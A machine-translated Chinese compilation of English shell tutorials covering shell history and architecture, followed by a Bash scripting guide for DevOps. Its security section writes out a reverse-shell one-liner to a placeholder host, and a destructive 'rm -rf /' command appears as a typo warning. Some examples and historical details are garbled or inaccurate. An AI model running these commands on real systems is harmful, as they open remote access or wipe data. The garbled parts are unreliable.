注:本文为 "Shell 脚本" 相关合辑。
英文引文,机翻未校。
如有内容异常,请看原文。
What Is a Shell? A complete, modern guide for developers, DevOps engineers and curious power-users.
什么是 Shell?面向开发者、DevOps 工程师与高级用户的完整现代指南
7/5/2025
Comprehensive guide to shells: history, architecture, system calls, scripting, security, and advanced customization. Learn processes, redirection, automation, and future trends to master command-line power for DevOps, security, and development.
本文为 Shell 全面指南,涵盖历史、架构、系统调用、脚本编写、安全与高级定制等内容。学习进程管理、重定向、自动化技术及未来发展趋势,掌握命令行能力,应用于 DevOps、安全与开发领域。
What Is a Shell?
什么是 Shell?
A complete, modern guide for developers, DevOps engineers and curious power-users.
面向开发者、DevOps 工程师与高级用户的完整现代指南。
1 Overview
1 概述
1.1 Definition and Purpose
1.1 定义与用途
A shell is a program that sits between you and the operating system (OS) kernel. It turns the commands you type (or script) into the low-level system calls the kernel understands, returning the results for you to read or pipe onward. In short, a shell is both:
Shell 是位于用户与操作系统内核之间的程序。它将用户输入(或脚本)中的指令转换为内核可识别的底层系统调用,并返回结果供用户查看或继续管道传递。简言之,Shell 兼具两类属性:
-
Command-line interpreter -- parses text and translates it into kernel requests.
命令行解释器 --- 解析文本并将其转换为内核请求。 -
Scripting language -- lets you string many requests together into repeatable workflows.
脚本语言 --- 可将多条请求组合为可重复执行的工作流程。
1.2 Shell vs Kernel vs Terminal
1.2 Shell、内核与终端的区别
| Layer 层级 | Role 作用 | Typical Tooling 典型工具 |
|---|---|---|
| Kernel | Directly manages CPU, memory, devices, file systems 直接管理 CPU、内存、设备与文件系统 | Linux, XNU, NT |
| Shell | Converts human commands to kernel syscalls 将用户指令转换为内核系统调用 | bash , zsh , fish , PowerShell |
| Terminal | Displays text I/O and sends keystrokes to the shell 展示文本输入输出并向 Shell 发送按键指令 | xterm , gnome-terminal , iTerm2, Windows Terminal |
A "terminal" is just the window; the "shell" is what runs inside that window and talks to the kernel.
"终端"仅为显示窗口,"Shell"则是在该窗口内部运行并与内核通信的程序。
1.3 Why Learn the Shell?
1.3 学习 Shell 的意义
-
Automation power -- glue every CLI tool on your system into pipelines.
自动化能力 --- 将系统中所有命令行工具串联为管道流程。 -
Portability -- scripts run on any POSIX-compliant host.
可移植性 --- 脚本可在任意兼容 POSIX 标准的主机上运行。 -
Transparency -- see every system call with
straceordtruss.
透明性 --- 通过strace或dtruss可查看所有系统调用过程。 -
Foundation for DevOps -- CI/CD, cloud provisioning, and container entrypoints all start in the shell.
DevOps 基础 --- CI/CD、云资源配置与容器入口点均以 Shell 为起点。
2 Historical Background
2 历史背景
2.1 Early Unix and the Bourne Shell
2.1 早期 Unix 与 Bourne Shell
1971 -- Ken Thompson's sh shipped with Version 6 Unix. It established $PATH, redirection (>, <), and simple pipelines.
1971 年,Ken Thompson 编写的 sh 随 Unix 第 6 版发布。该程序确立了 $PATH、重定向(>、<)与简易管道机制。
2.2 C Shell, KornShell, and Bourne-Again Shell
2.2 C Shell、KornShell 与 Bourne-Again Shell
-
csh/tcsh (1978) -- C-style syntax, aliases, history.
csh/tcsh(1978 年)--- 类 C 语法、别名、历史记录功能。 -
ksh (1983) -- function definitions, associative arrays,
$(... )subshells.
ksh (1983 年)--- 支持函数定义、关联数组、$(... )子 shell。 -
bash (1989) -- GNU rewrite; today's de-facto standard on Linux and macOS.
bash(1989 年)--- GNU 重写版本,为当前 Linux 与 macOS 系统的默认标准 Shell。
2.3 Modern CLI & GUI Shells
2.3 现代命令行与图形界面 Shell
- zsh -- extensible, rich completion, Oh-My-Zsh ecosystem.
zsh --- 可扩展、补全功能丰富,依托 Oh-My-Zsh 生态。 - fish -- user-friendly defaults, real-time syntax hints.
fish --- 默认配置友好,提供实时语法提示。 - PowerShell -- object-based pipelines on Windows, Linux, macOS.
PowerShell --- 跨 Windows、Linux、macOS 的面向对象管道 Shell。 - Desktop "shells" -- GNOME Shell, Windows Explorer; graphical cousins of the CLI.
桌面 Shell --- GNOME Shell、Windows 资源管理器,为命令行 Shell 的图形化同类程序。
3 Computer-Science Foundations
3 计算机科学基础
3.1 Von Neumann Architecture & User-/Kernel Modes
3.1 冯·诺依曼架构与用户态/内核态
A CPU in user mode cannot touch hardware directly; it must trap into kernel mode via system calls. The shell runs entirely in user space, relying on those calls (read, write, execve) to do real work.
处于用户态 的 CPU 无法直接操作硬件,需通过系统调用陷入内核态 。Shell 全程运行于用户空间,依靠 read、write、execve 等系统调用完成实际操作。
3.2 Process Creation
3.2 进程创建
-
fork()-- duplicate current process.
fork()--- 复制当前进程。 -
execvp()-- replace child's memory with a new program.
execvp()--- 以新程序覆盖子进程内存空间。 -
waitpid()-- parent blocks until child exits; retrieves exit status.
waitpid()--- 父进程阻塞直至子进程退出,并获取退出状态。
3.3 System-Call Flow (REPL Loop)
3.3 系统调用流程(REPL 循环)
readline() - parse() - fork() ─┐
│ child - execvp() - program runs
parent ← waitpid() ←─────────────┘
readline() - parse() - fork() ─┐
│ 子进程 - execvp() - 程序运行
父进程 ← waitpid() ←───────────┘
Every command you type triggers this miniature life-cycle.
用户输入的每一条指令都会触发该微型生命周期流程。
4 Anatomy of a Shell Session
4 Shell 会话结构
4.1 Lexing, Parsing & Expansion
4.1 词法分析、解析与扩展
Tokens are split on whitespace, then expanded: variables $HOME, command substitution $(date), arithmetic ( ( 1 + 1 ) ) ((1+1)) ((1+1)).
指令按空白字符分割为词法单元,随后完成扩展:变量 $HOME、命令替换 $(date)、算术运算 ( ( 1 + 1 ) ) ((1+1)) ((1+1))。
4.2 Environment Variables & Startup Files
4.2 环境变量与启动配置文件
| File | Loaded When | Common Uses |
|---|---|---|
~/.profile |
login shells 登录式 Shell | PATH setup, locale PATH 配置、区域设置 |
~/.bashrc |
interactive shells 交互式 Shell | aliases, prompt 别名、命令提示符 |
~/.zshrc |
interactive zsh 交互式 zsh | plugins, theme 插件、主题 |
4.3 Prompt Rendering & Job Control
4.3 提示符渲染与任务控制
-
PS1 -- primary prompt string; can embed
\u@\h:\w \$for user, host, cwd.
PS1 --- 主提示符字符串,可嵌入\u@\h:\w \$展示用户名、主机名与当前工作目录。 -
Jobs --
Ctrl-Zto suspend,bg/fgto manage foreground & background tasks.
任务 ---Ctrl-Z挂起任务,bg/fg管理前台与后台任务。
5 Core Features
5 主要功能
5.1 Command Execution & Exit Status
5.1 命令执行与退出状态
Zero (0) = success; non-zero signals error. $? exposes the last status.
数值 0 代表执行成功,非零数值代表执行异常。$? 可获取上一条命令的退出状态。
5.2 Redirection & Pipes
5.2 重定向与管道
-
>overwrite,>>append,<input file.
>覆盖写入,>>追加写入,<读取输入文件。 -
command1 | command2streams stdout of the first into stdin of the second.
command1 | command2将第一条命令的标准输出流作为第二条命令的标准输入。
5.3 Globbing & Wildcards
5.3 文件名通配与通配符
*.cmatches every C source file.
*.c匹配所有 C 语言源文件。**/*.py(withshopt -s globstaror zsh) searches recursively.
**/*.py(开启shopt -s globstar或在 zsh 中)实现递归搜索。
5.4 Scripting Basics
5.4 脚本编写基础
bash
#!/usr/bin/env bash
set -euo pipefail # strict mode
for f in *.log; do
grep -q ERROR "$f" && echo "Alert: $f"
done
python
#!/usr/bin/env bash # 指定使用 bash 作为解释器
set -euo pipefail # 启用严格模式
# -e: 如果任何命令返回非零状态,脚本立即退出
# -u: 如果引用了未定义的变量,脚本立即退出
# -o pipefail: 如果管道中的任何命令失败,整个管道返回非零状态
for f in *.log; do # 遍历当前目录下所有以 .log 结尾的文件
grep -q ERROR "$f" && echo "Alert: $f" # 检查文件中是否包含 "ERROR"
# -q: 使 grep 在找到匹配时不输出任何内容,只返回状态码
# 如果 grep 找到 "ERROR",则执行 echo 命令输出警告信息
done
6 Shell Varieties in Depth
6 Shell 类型详解
6.1 Bourne Family
6.1 Bourne 家族
Lightweight dash for /bin/sh on Ubuntu; feature-rich bash for everyday work.
Ubuntu 系统 /bin/sh 采用轻量级 dash ,日常使用则以功能完备的 bash 为主。
6.2 C Family
6.2 C 语言家族
tcsh offers auto-completion and command correction but inherits quirky syntax (if (expr) then ... endif).
tcsh 支持自动补全与命令纠错,但语法较为特殊(if (expr) then ... endif)。
6.3 KornShell
6.3 KornShell
Still popular in legacy UNIX shops; combines Bourne simplicity with C-style arrays.
在传统 UNIX 环境中仍广泛使用,兼具 Bourne Shell 的简洁性与类 C 数组特性。
6.4 Enhanced Interactive Shells
6.4 增强型交互式 Shell
-
zsh -- right-prompt, shared history, powerful glob qualifiers (
ls **/*(.om[1,5])).
zsh --- 右侧提示符、共享历史记录、强大的通配符限定符(ls **/*(.om[1,5]))。 -
fish -- zero-config suggestions,
fish_configweb UI.
fish --- 无需配置的命令提示、fish_config网页配置界面。
6.5 Cross-Platform & Windows
6.5 跨平台与 Windows 环境
-
PowerShell 7+ -- treats pipeline objects, not text:
PowerShell 7+ --- 以对象而非文本作为管道传输载体:
powershellGet-Process | Where CPU -gt 100 | Stop-Process -
Classic cmd.exe for legacy scripts.
传统 cmd.exe 用于兼容旧脚本。
6.6 Graphical Desktop Shells
6.6 图形化桌面 Shell
Provide windows, docks, compositors; invoke CLI shells backstage for tasks.
提供窗口、停靠栏与合成器功能,后台调用命令行 Shell 完成任务。
7 Practical Use-Cases & Benefits
7 实际应用场景与价值
7.1 Automation & CI/CD
7.1 自动化与 CI/CD
Bash drives Dockerfiles , GitHub Actions, Kubernetes init-containers.
Bash 用于驱动 Dockerfile、GitHub Actions 与 Kubernetes 初始化容器。
7.2 System Administration
7.2 系统管理
SSH into hundreds of servers; combine for host in $(<hosts); do ...; done.
通过 SSH 批量登录数百台服务器,结合 for host in $(<hosts); do ...; done 完成批量操作。
7.3 Data Processing Pipelines
7.3 数据处理管道
cat access.log | awk '{print $9}' | sort | uniq -c | sort -nr | head
-
cat access.log:显示access.log文件的内容。 -
|:管道符,将前一个命令的输出传递给下一个命令。 -
awk '{print $9}':提取每一行的第 9 列内容。在许多 Web 服务器的访问日志中,第 9 列通常表示 HTTP 状态码(如 200、404 等)。 -
sort:对提取出的状态码进行排序,以便后续的统计可以更容易地进行。 -
uniq -c:uniq命令用于去重并统计每个唯一状态码的出现次数。-c选项表示在输出中显示每个状态码的出现次数。 -
sort -nr:再次使用sort,但这次是对状态码的计数进行排序。-n表示按数字排序,-r表示以降序排列,即出现次数最多的状态码会排在前面。 -
head:此命令用于显示输出的前 10 行,通常用以查看出现频率最高的状态码。
整条命令的作用是:用于分析访问日志(access.log)中 HTTP 状态码的出现频率。
从 access.log 文件中提取出 HTTP 状态码,统计每个状态码的出现次数,并按出现频率降序排列,最终显示出现次数最多的前 10 个状态码。
7.4 Security & Incident Response
7.4 安全与应急响应
Reverse shells (/bin/bash -i >& /dev/tcp/host/4444 0>&1), log triage, malware analysis with strings, hexdump.
反向 Shell(/bin/bash -i >& /dev/tcp/host/4444 0>&1)、日志排查、借助 strings 与 hexdump 进行恶意软件分析。
7.5 Scientific Reproducibility
7.5 科研可复现性
Shell scripts orchestrate Jupyter, conda, and Slurm jobs so others can replay experiments.
Shell 脚本可编排 Jupyter、conda 与 Slurm 任务,便于他人复现实验流程。
8 Security Considerations
8 安全注意事项
8.1 Permissions & Least-Privilege
8.1 权限与最小权限原则
Never run daily tasks as root; use sudo with fine-grained rules.
日常操作禁止以 root 用户执行,通过 sudo 配置精细化权限规则。
8.2 Common Threats
8.2 常见安全威胁
-
Command injection -- sanitise user data before
$(...)or backticks.
命令注入 --- 在使用$(...)或反引号前对用户数据进行过滤。 -
Typosquatting --
rm -rf / tmp/*(missing space) wipes root.
输入错误风险 ---rm -rf / tmp/*(缺少空格)会清除根目录数据。
8.3 Hardening Tips
8.3 安全加固建议
-
set -o noclobberto stop accidental>truncation.
set -o noclobber防止>意外覆盖文件。 -
Use quotes around expansions:
"${var}".对扩展变量添加引号:
"${var}"。 -
Enable
fail2ban+ SSH keys.启用
fail2ban并使用 SSH 密钥登录。
9 Advanced Topics
9 高级主题
9.1 Customisation & Theming
9.1 定制化与主题
Oh-My-Zsh, Starship prompt, Powerlevel10k provide git status and exit codes inline.
Oh-My-Zsh、Starship 提示符、Powerlevel10k 可内嵌展示 Git 状态与命令退出码。
9.2 Shell Extensions & Frameworks
9.2 Shell 扩展与框架
-
zinit , antidote -- zsh plugin managers.
zinit 、antidote --- zsh 插件管理器。 -
Fisher -- fish plugins.
Fisher --- fish 插件管理器。 -
PowerShell modules -- Azure, AWS, VMware cmdlets.
PowerShell 模块 --- 提供 Azure、AWS、VMware 相关命令集。
9.3 Embedded, Web-Based & Cloud Shells
9.3 嵌入式、网页版与云 Shell
-
BusyBox sh inside routers.
BusyBox sh 用于路由器等嵌入式设备。 -
AWS CloudShell , Azure Cloud Shell give browser-based terminals with pre-auth cloud CLIs.
AWS CloudShell 、Azure CloudShell 提供浏览器终端,内置预授权云命令行工具。
9.4 Future Trends
9.4 发展趋势
AI-driven completions (GitHub Copilot CLI, Warp AI), in-terminal embedding of VS Code style diagnostics.
AI 驱动的命令补全(GitHub Copilot CLI、Warp AI)、终端内嵌 VS Code 风格诊断信息。
10 Getting Started
10 入门指南
10.1 Accessing a Shell
10.1 Shell 访问方式
-
Linux/macOS -- open Terminal, iTerm2, or tty
Ctrl-Alt-F3.
Linux/macOS --- 打开终端、iTerm2,或通过Ctrl-Alt-F3进入 tty 控制台。 -
Windows -- install Windows Terminal, enable WSL for a genuine Linux bash.
Windows --- 安装 Windows Terminal,启用 WSL 获取原生 Linux bash。
10.2 Essential Beginner Commands
10.2 入门必备命令
| Command | Purpose |
|---|---|
pwd |
print working directory 打印当前工作目录 |
ls -lah |
list files, human-readable sizes 列出文件并展示易读大小 |
cd /path |
change directory 切换目录 |
man <cmd> |
open manual page 打开命令手册 |
| `history | grep` |
10.3 Learning Resources
10.3 学习资源
-
"The Linux Command Line" -- William Shotts
《Linux 命令行》--- William Shotts 著
-
tldrpages for concise examples (npm i -g tldr)
tldr工具提供精简示例(npm i -g tldr) -
OverTheWire's Bandit wargame for security practice
OverTheWire 的 Bandit 攻防游戏用于安全实践练习
11 Conclusion & Next Steps
11 总结与后续学习方向
Mastering the shell is the fastest path from consumer to power-user . Whether you're building a mini-shell in C , deploying microservices, or reverse-engineering binaries, the concepts above---process creation, redirection, scripting discipline, and security hygiene---form the bedrock of professional computing.
掌握 Shell 是从普通用户进阶为高级用户的高效途径。无论使用 C 语言编写简易 Shell、部署微服务还是逆向分析二进制程序,进程创建、重定向、脚本规范与安全习惯等知识均为专业计算领域的基础。
Spin up a VM, run strace -f bash, and watch your commands traverse the user--kernel boundary in real time. Every prompt is an invitation to automate the boring, investigate the complex, and craft resilient systems. Happy hacking!
启动虚拟机,执行 strace -f bash,实时观察指令跨越用户态与内核态的过程。每一次命令提示符都是一次契机,用于自动化重复工作、分析复杂问题、构建稳定系统。祝探索愉快!
Bash Like an Engineer: Smarter Scripting for DevOps
像工程师一样编写 Bash:面向 DevOps 的更智能脚本编写
29 May 2025
When you think of Bash, you probably think of quick fixes, hacked-together cron jobs, or obscure one-liners you copied from Stack Overflow at 2 a.m. But Bash scripting doesn't have to be messy or fragile. In fact, when treated with the same discipline we apply to other languages, Bash can be a powerful, safe, and maintainable tool---especially for DevOps workflows.
提起 Bash,人们通常会联想到临时解决方案、拼凑而成的定时任务,或是凌晨从技术问答网站复制的晦涩单行命令。但 Bash 脚本并非必然杂乱且脆弱。实际上,若采用与其他编程语言相同的规范进行编写,Bash 可成为一种高效、安全且可维护的工具,在 DevOps 工作流中尤为适用。
In this post, I'll walk you through:
本文将介绍以下内容:
-
Bash tricks every DevOps engineer should know
每位 DevOps 工程师均应掌握的 Bash 技巧
-
How to write structured, testable, and debug-friendly scripts
如何编写结构化、可测试且便于调试的脚本
-
Safety practices to avoid production disasters
规避生产环境故障的安全实践
-
A real-world example from my toolkit
来自实用工具库的真实场景示例
Let's dive in.
让我们开始深入学习。
Thinking Like a Software Engineer in Bash
以软件工程思维编写 Bash 脚本
Many DevOps scripts start as a quick fix---and stay that way. But you can bring software engineering principles into Bash scripting with just a few simple habits:
多数 DevOps 脚本最初仅作为临时方案,且长期保持此形态。通过几项简单习惯,即可将软件工程原则融入 Bash 脚本编写:
Use Functions to Structure Your Code
使用函数构建代码结构
Instead of writing everything in a top-down blob, split your logic into functions:
避免采用自上而下的平铺式编写方式,将逻辑拆分为函数:
#!/usr/bin/env bash
set -euo pipefail
log_info() {
echo "[INFO] $*"
}
backup_database() {
# some logic here
log_info "Starting database backup"
}
main() {
backup_database
}
main "$@"
Why? Easier testing, readability, and future reuse. Think of main() as the script's entrypoint, just like in C or Python.
这样做的意义在于提升可测试性、可读性与后续复用性。可将 main() 视作脚本入口,与 C 或 Python 语言的设计一致。
Self-Debugging Bash: Know What Your Script is Doing
Bash 自调试:明确脚本执行行为
Ever had a script silently fail? Or worse, behave unpredictably? Here's how to make it transparent and debuggable .
是否遇到过脚本静默失败,甚至出现不可预期的行为?以下方法可让脚本执行过程清晰可追溯、便于调试。
Enable Fail-Fast Mode
启用快速失败模式
Start every serious Bash script with this:
正式的 Bash 脚本均应以此行开头:
set -euo pipefail
IFS=$'\n\t'
-
-e: exit on error
-e:发生错误时退出 -
-u: error on unset variables
-u:未定义变量视为错误 -
-o pipefail: fail if any command in a pipeline fails -
-o pipefail`:管道中任一命令执行失败则整体失败
-
IFS: safer word splitting
IFS:更安全的字段分隔规则
Add Traps for Debugging
添加捕获机制用于调试
Catch script exits, signals, or errors:
捕获脚本退出、信号或错误信息:
trap 'echo "ERROR: Script failed at line $LINENO"; exit 1' ERR
trap 'echo "Script exited cleanly."' EXIT
Now, when something goes wrong, you know where .
出现异常时,可精准定位问题位置。
Trace with set -x --- See What Your Script is Doing
通过 set -x 追踪执行过程------查看脚本实际操作
Sometimes your Bash script doesn't crash, but it still misbehaves. Maybe it's skipping a step, passing the wrong variable, or silently doing something unexpected.
部分场景下 Bash 脚本不会崩溃,但执行行为异常,例如跳过步骤、传递错误变量或静默执行非预期操作。
This is where set -x shines. It enables execution tracing , printing every command and its arguments before they run.
此时 set -x 可发挥作用,该指令启用执行追踪,在每条命令执行前打印命令及其参数。
set -x # Turn on command tracing
Or, if you're running a script externally:
或在外部执行脚本时使用:
bash -x script.sh
Example:
示例:
#!/usr/bin/env bash
set -x
name="world"
echo "Hello, $name!"
Output:
输出:
+ name=world
+ echo 'Hello, world!'
Hello, world!
You'll see exactly what the script is doing, which helps identify subtle bugs---like incorrect substitutions, misordered logic, or silently failing branches.
可清晰查看脚本执行流程,便于定位隐蔽问题,例如错误的变量替换、逻辑顺序异常或分支静默失效。
Heads-up: set -x is Extremely Verbose
注意:set -x 输出信息极为详尽
⚠️ Warning:
set -xcan generate a flood of output , especially in larger scripts or when looping over files, parsing input, or running background processes. It can also inadvertently log sensitive data ---such as passwords in command-line arguments or environment variables.
⚠️ 警告:set -x会产生大量输出,在大型脚本、文件遍历、输入解析或后台进程运行场景中尤为明显。该指令还可能意外记录敏感数据,例如命令行参数或环境变量中的密码。
So when should you use it?
适用场景:
✔️ During development or debugging
✔️ 开发或调试阶段
❌ Not in production unless output is redirected and scrubbed
❌ 生产环境禁用,除非对输出进行重定向与脱敏处理
✔️ Only when explicitly enabled by a flag or environment variable
✔️ 仅通过标识或环境变量显式启用
Best Practice: Conditional Tracing with DEBUG Mode
最佳实践:通过 DEBUG 模式实现条件追踪
To avoid hardcoding set -x into your script, use a simple flag pattern like this:
避免在脚本中硬编码 set -x,可采用以下简洁标识方案:
[[ "${DEBUG:-0}" -eq 1 ]] && set -x
This checks whether the environment variable DEBUG is set to 1. If so, it enables tracing.
该语句检测环境变量 DEBUG 是否为 1,若是则启用追踪。
Now you can run:
执行方式:
./script.sh # Normal mode
DEBUG=1 ./script.sh # Debug mode with tracing
You get debug output only when you want it --- and your logs stay clean by default.
仅在需要时获取调试输出,默认保持日志简洁。
Optional: Support a --debug Flag
可选方案:支持 --debug 命令行标识
If you prefer using CLI flags, add this:
若偏好使用命令行标识,可添加如下代码:
DEBUG=0
while [[ $# -gt 0 ]]; do
case "$1" in
--debug) DEBUG=1 ;;
esac
shift
done
[[ "$DEBUG" -eq 1 ]] && set -x
Now you can run:
执行方式:
./script.sh --debug
Protect Sensitive Data
敏感数据保护
Always be mindful of what you log when set -x is active. For example:
启用 set -x 时需关注日志内容,示例如下:
PASSWORD="secret"
curl -u "admin:$PASSWORD" https://example.com # Will leak password in trace!
If your script deals with secrets, avoid enabling full tracing, or mask critical values before logging them.
若脚本涉及密钥信息,应禁用完整追踪,或在日志记录前对关键值脱敏。
By using conditional DEBUG tracing, you maintain control over verbosity and security while keeping the powerful insights of set -x just a flag away.
通过条件式 DEBUG 追踪,可兼顾输出详略控制与安全性,同时保留 set -x 的调试能力。
Bash Safety 101: Guard Rails for Production Scripts
Bash 安全基础:生产环境脚本防护规则
Writing production-ready Bash scripts requires a defensive mindset . Bash is powerful but unforgiving---small oversights can lead to major failures. Here's how to reduce risk with safer scripting practices.
编写生产级 Bash 脚本需具备防御性思维。Bash 功能强大但容错性低,细微疏忽即可引发严重故障。以下安全编写规范可降低风险。
Quote Everything
全部变量添加引号
Unquoted variables are one of the most common causes of unexpected behavior in Bash scripts. They can break commands when variables contain spaces, are empty, or have special characters.
未加引号的变量是 Bash 脚本出现异常行为的常见原因。当变量包含空格、为空或含特殊字符时,会导致命令执行异常。
rm -rf "$TARGET_DIR" # Safe
rm -rf $TARGET_DIR # Dangerous if empty or contains spaces
If $TARGET_DIR is unset or blank, the second line becomes rm -rf, potentially deleting everything in the current directory.
若 $TARGET_DIR 未定义或为空,第二条命令会变为 rm -rf,可能删除当前目录全部内容。
Validate Input
输入校验
Assume nothing. Scripts often fail due to missing or malformed input. Validate arguments before using them:
不做任何默认假设。脚本常因输入缺失或格式异常失效,使用参数前需进行校验:
[[ -z "${1:-}" ]] && { echo "Usage: $0 <target_dir>"; exit 1; }
This ensures the required argument is present before the script proceeds.
该语句确保脚本执行前必选参数已传入。
Use mktemp for Temporary Files
使用 mktemp 创建临时文件
Hardcoding temporary filenames invites collisions and race conditions. Instead, use mktemp to safely generate unique filenames:
硬编码临时文件名易引发命名冲突与竞态条件,应使用 mktemp 安全生成唯一文件名:
TMP_FILE=$(mktemp)
Always clean up temporary files after use to avoid clutter or leaks.
使用后及时清理临时文件,避免文件残留或信息泄露。
Be Explicit with Destructive Commands
明确执行破坏性命令
When using commands like rm, mv, or cp, add verbosity (-v) and consider a dry-run mode for testing. Log actions clearly before execution. It's better to be overly cautious than to guess in production.
使用 rm、mv、cp 等命令时,添加详细输出参数 -v,并可设置测试用模拟执行模式。执行前清晰记录操作,生产环境中谨慎操作优于模糊执行。
Testing Your Bash Scripts
Bash 脚本测试
Testing isn't just for compiled languages or high-level frameworks. Bash scripts can and should be tested---especially if they're part of your infrastructure automation. The Bats framework makes this possible.
测试并非仅适用于编译型语言或高级框架。Bash 脚本同样可进行测试,在基础设施自动化场景中尤为必要。Bats 框架可实现该需求。
What is Bats?
Bats 简介
Bats (Bash Automated Testing System) provides a simple, readable way to write test cases for your scripts. It helps you verify script behavior in isolation or as part of CI pipelines.
Bats(Bash 自动化测试系统)提供简洁易懂的脚本测试用例编写方式,可独立验证脚本行为,也可集成至 CI 流程。
Example Test Case
测试用例示例
@test "Backup completes successfully" {
run ./my_backup.sh
[ "$status" -eq 0 ]
}
This test runs the script and checks that it exits with a status code of 0 (success). You can also assert on the script's output or any file system changes it performs.
该测试执行脚本并校验退出码为 0(执行成功),也可对脚本输出或文件系统变更进行断言验证。
Setup Instructions
安装步骤
-
Install Bats:
安装 Bats:
git clone https://github.com/bats-core/bats-core.git sudo ./bats-core/install.sh /usr/local -
Create a test file:
创建测试文件:
mkdir tests touch tests/test_my_script.bats -
Run tests:
执行测试:
bats tests/
Incorporating Bats into your CI/CD pipeline allows you to catch regressions early and ensure your Bash scripts behave as expected across environments.
将 Bats 集成至 CI/CD 流程,可提前发现功能退化问题,保障 Bash 脚本在多环境中执行符合预期。
Example CI Testing with GitHub Actions
基于 GitHub Actions 的 CI 测试示例
You can automate Bash script testing using Bats and GitHub Actions:
可通过 Bats 与 GitHub Actions 实现 Bash 脚本自动化测试:
Example Structure :
目录结构示例:
.
├── my_script.sh
├── tests/
│ └── test_my_script.bats
├── .github/workflows/ci.yml
Sample Bats Test (tests/test_my_script.bats) :
Bats 测试示例(tests/test_my_script.bats):
@test "Script runs without error" {
run ./my_script.sh
[ "$status" -eq 0 ]
}
GitHub Actions Workflow :
GitHub Actions 工作流:
name: Test Bash Scripts
on: [push, pull_request]
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: git clone --depth=1 https://github.com/bats-core/bats-core.git
- run: sudo ./bats-core/install.sh /usr/local
- run: chmod +x *.sh
- run: bats tests/
This lets you test Bash scripts like real software---automatically and reliably.
该方案可实现对 Bash 脚本的自动化、可靠测试,与常规软件测试一致。
Real-World Toolkit Example: Safe Cleanup Script
实用工具真实示例:安全清理脚本
Below is a production-safe Bash script to delete logs older than a certain number of days. It's structured, safe, and ready for automation or CI integration:
以下为生产安全级 Bash 脚本,用于删除超过指定天数的日志文件。脚本结构规范、安全性高,可直接用于自动化或 CI 集成:
#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'
LOG_DIR="/var/log/myapp"
DAYS_TO_KEEP=7
log() {
echo "[$(date +'%F %T')] $*"
}
clean_old_logs() {
log "Looking for files older than $DAYS_TO_KEEP days in $LOG_DIR"
find "$LOG_DIR" -type f -mtime +"$DAYS_TO_KEEP" -print -delete
log "Cleanup complete."
}
main() {
[[ -d "$LOG_DIR" ]] || {
log "Log directory not found: $LOG_DIR"
exit 1
}
clean_old_logs
}
trap 'log "Script exited unexpectedly at line $LINENO"' ERR
trap 'log "Script completed."' EXIT
main "$@"
Let's walk through that script: safely deletes old log files, commonly used in log rotation or maintenance routines.
该脚本可安全删除过期日志文件,常用于日志轮转或系统维护任务。
#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'
Fail-Fast Settings
快速失败配置
-
-e: Exit immediately on any error.
-e:任意错误发生时立即退出。 -
-u: Treat unset variables as errors.
-u:未定义变量视为错误。 -
-o pipefail: Exit if any command in a pipeline fails.
-o pipefail:管道中任一命令失败则退出。 -
IFS: Sets a safer internal field separator to handle file names with spaces or tabs.
IFS:设置更安全的内部字段分隔符,适配含空格或制表符的文件名。LOG_DIR="/var/log/myapp"
DAYS_TO_KEEP=7
Configuration Block
配置模块
Defines constants up front. Makes the script easy to adapt without editing logic later on.
提前定义常量,无需修改逻辑即可快速适配场景。
log() { echo "[$(date +'%F %T')] $*"; }
Logging Function
日志函数
Adds a timestamp to every message, improving traceability, especially when logs are redirected to files or viewed in CI output.
为每条日志添加时间戳,提升可追溯性,在日志重定向至文件或 CI 输出查看场景中效果显著。
clean_old_logs() {
log "Looking for files older than $DAYS_TO_KEEP days in $LOG_DIR"
find "$LOG_DIR" -type f -mtime +$DAYS_TO_KEEP -print -delete
log "Cleanup complete."
}
Cleanup Logic
清理逻辑
findlocates files older thanDAYS_TO_KEEP.
find定位超过DAYS_TO_KEEP天数的文件。-printshows which files will be removed.
-print显示待删除文件。-deleteperforms the deletion.
-delete执行删除操作。
This combination gives visibility before destructive action is taken, and the modular design improves testability.
该组合在执行破坏性操作前提供可见性,模块化设计提升可测试性。
main() {
[[ -d "$LOG_DIR" ]] || { echo "Log directory not found: $LOG_DIR"; exit 1; }
clean_old_logs
}
Entrypoint
入口函数
Encapsulates the logic and validates prerequisites. Ensures the script doesn't run if the target directory doesn't exist.
封装逻辑并校验前置条件,确保目标目录不存在时脚本不执行。
trap 'log "Script exited unexpectedly at line $LINENO"; exit 1' ERR
trap 'log "Script completed."' EXIT
Error and Exit Traps
错误与退出捕获
-
Logs the line number on failure for easier debugging.
失败时记录行号,便于调试。 -
Confirms successful completion when the script ends.
脚本结束时确认执行完成。main "$@"
Main Call
主函数调用
This line calls the main function and passes all command-line arguments that were given to the script into it.
该行调用 main 函数,并将脚本接收的全部命令行参数传入。
In short: main "$@" = run main() with all script arguments, safely and cleanly.
简言之:main "$@" 表示携带全部脚本参数安全、简洁地执行 main()。
Summary: Why This Script is Safe and Reliable
总结:该脚本安全可靠的原因
- Uses fail-fast settings to avoid silent failures
采用快速失败配置,避免静默失效 - Validates all inputs and environment dependencies
校验所有输入与环境依赖 - Provides clear, timestamped logging for observability
提供带时间戳的清晰日志,提升可观测性 - Is structured with functions, making it easier to maintain and test
基于函数构建结构,便于维护与测试 - Uses traps to improve debugging and error reporting
通过捕获机制优化调试与错误上报
This pattern can be adapted for many use cases---from cleanup to backups to automation. It's a strong foundation for writing safer Bash in real-world systems.
该模式可适配多种场景,包括文件清理、备份与自动化任务,是实际系统中编写安全 Bash 脚本的基础范式。
Final Thoughts
结语
Bash is everywhere in DevOps---from provisioning to automation, deployment, and recovery. But too often, it's treated like a second-class citizen. With a bit of structure, discipline, and tooling, you can make your Bash scripts:
Bash 贯穿 DevOps 全流程,涵盖环境部署、自动化、发布与故障恢复。但该语言常被视作次要工具。通过结构化设计、规范编写与工具支撑,可让 Bash 脚本具备以下特性:
- Maintainable
可维护 - Safe
安全 - Testable
可测试 - Debuggable
可调试
And most importantly---trusted by your future self and your team.
更重要的是,可获得自身与团队的长期信赖。
Next time you write a script, don't just make it work. Make it engineered .
下次编写脚本时,不仅要实现功能,更要遵循工程化规范。
20 essential shell commands for DevOps engineers
DevOps 工程师必备的 20 条 Shell 命令
28 Feb 2026
by Disqus
Moving from software development to DevOps means the terminal is no longer just for Git commits; it's your primary interface for production infrastructure. This guide categorizes the 20 most critical commands by their real-world utility.
从软件开发转向 DevOps 后,终端不再仅用于 Git 提交,而是生产基础设施的主要操作界面。本文按实际用途分类整理 20 条核心命令。
